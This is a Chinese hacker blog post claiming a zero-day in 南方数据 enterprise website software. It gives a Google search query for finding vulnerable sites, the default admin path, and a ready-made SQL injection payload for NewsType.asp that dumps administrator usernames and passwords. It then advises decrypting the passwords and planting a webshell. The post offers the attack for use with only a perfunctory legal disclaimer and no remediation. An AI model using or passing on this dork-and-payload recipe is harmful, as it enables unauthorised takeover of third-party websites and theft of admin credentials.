Hacker 小风's Blog

路的尽头,仍然是路,只要你愿意走。

南方数据企业0day漏洞爆后台密码




南方数据的漏洞比较多各种版本的漏洞也显而易见。
这里要讲的是南方数据企业0day直接爆后台密码方法。
南方数据企业0day漏洞爆后台密码
谷歌搜索:inurl:”HomeMarket.asp”
默认后台地址:/admin
直接在网址后面加上利用代码即可直接爆出管理员的帐号密码
利用代码:
NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20
union%20select%20*%20from%20news%20where%201=2%20and%20''='
爆出帐号密码后直接解密就可以获得管理员的帐号密码。然后在进一步的拿webshell
————————————————————————–
免责申明:请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果本博客不承担任何责任!
————————————————————————–

评论

© Hacker 小风's Blog | Powered by LOFTER